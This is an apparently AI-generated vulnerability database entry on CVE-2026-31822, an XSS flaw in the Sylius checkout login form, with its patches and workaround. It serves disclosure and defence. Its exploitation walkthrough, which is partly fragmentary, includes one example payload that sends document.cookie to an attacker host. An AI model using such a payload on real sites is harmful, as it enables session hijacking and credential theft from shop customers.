
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-31822 is a Cross-Site Scripting (XSS) vulnerability in the Sylius open-source eCommerce Framework (built on Symfony) affecting the shop checkout login form. The flaw exists in the ApiLoginController Stimulus controller, where failed login responses are rendered into the DOM via innerHTML without sanitization. It affects Sylius versions 2.0.0–2.0.15, 2.1.0–2.1.11, and 2.2.0–2.2.2, and was disclosed on March 9, 2026, with patches released the same day. The vulnerability carries a CVSS v3.1 score of 6.1 (Medium) and a CVSS v4.0 score of 5.3 (Medium) (GitHub Advisory, Sylius Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically the use of innerHTML to render the message field from the AuthenticationFailureHandler JSON response in ApiLoginController.js. In the default configuration, the message originates from AuthenticationException::getMessageKey() passed through Symfony's translator, which returns a hardcoded string — limiting direct exploitability. However, the risk escalates in scenarios where: (1) a custom AuthenticationFailureHandler includes user-supplied data in the message, (2) translation files are sourced from an untrusted CMS or database, (3) a man-in-the-middle attacker intercepts and modifies the HTTP response, or (4) middleware/reverse proxies inject content into the JSON response body. The fix replaces innerHTML assignment with textContent to prevent HTML/JavaScript parsing (Sylius Advisory, GitHub Advisory).
Successful exploitation can lead to session hijacking, credential theft, cart/order manipulation, and phishing attacks executed within the trusted shop domain. An attacker who can influence the authentication failure message — through a customized handler, compromised translation source, or network interception — can inject arbitrary JavaScript that executes in the victim's browser during a checkout login attempt. Availability is not impacted, but confidentiality and integrity of the subsequent (browser) system are both rated Low under CVSS v4.0 (GitHub Advisory, Sylius Advisory).
There is no known public proof-of-concept exploit and no evidence of in-the-wild exploitation at this time (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.05% (16th percentile), indicating a low near-term exploitation probability. Exploitation requires passive user interaction (a victim must attempt to log in at the checkout page) and is most realistic in non-default configurations or under network interception conditions.
AuthenticationFailureHandler that echoes user-supplied input (e.g., username) in the error message, or whether the site is accessible over HTTP (enabling MitM), or uses a CMS-backed translation system.message field of the authentication failure JSON response, e.g.: {"success": false, "message": "<img src=x onerror=document.location='https://attacker.com/steal?c='+document.cookie>"}.message field with the malicious payload (MitM).ApiLoginController.js renders the tampered message via innerHTML, executing the injected script in the victim's browser./shop/login-check or equivalent) followed by unusual redirects or resource loads to external domains in the same session.<script> tags in the message field of the JSON response body, detectable via WAF or API gateway logging (Sylius Advisory).Upgrade Sylius to the patched versions: 2.0.16, 2.1.12, or 2.2.3 (or later). For installations that cannot be immediately upgraded, a workaround is available: override ApiLoginController.js by copying it from vendor/sylius/sylius/.../ApiLoginController.js to assets/shop/controllers/ApiLoginController.js and replacing errorElement.innerHtml = response.message with errorElement.textContent = response.message. For Sylius 2.1+, disable the vendor controller in controllers.json and register the patched version in bootstrap.js; for Sylius 2.0, use Webpack's NormalModuleReplacementPlugin to swap the controller at build time, then rebuild assets with yarn encore production. Additionally, ensure authentication failure messages do not include user-supplied input, and serve the application over HTTPS to mitigate MitM attack vectors (Sylius Advisory, GitHub Advisory).
The vulnerability was responsibly disclosed by Bartłomiej Nowiński (@bnBart) and acknowledged by the Sylius security team, who published a detailed advisory with workaround instructions on March 9, 2026. Sylius also published a security blog post covering the issue (Sylius Blog). No significant broader media coverage or notable community controversy has been observed beyond standard vulnerability tracking and advisory aggregation.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."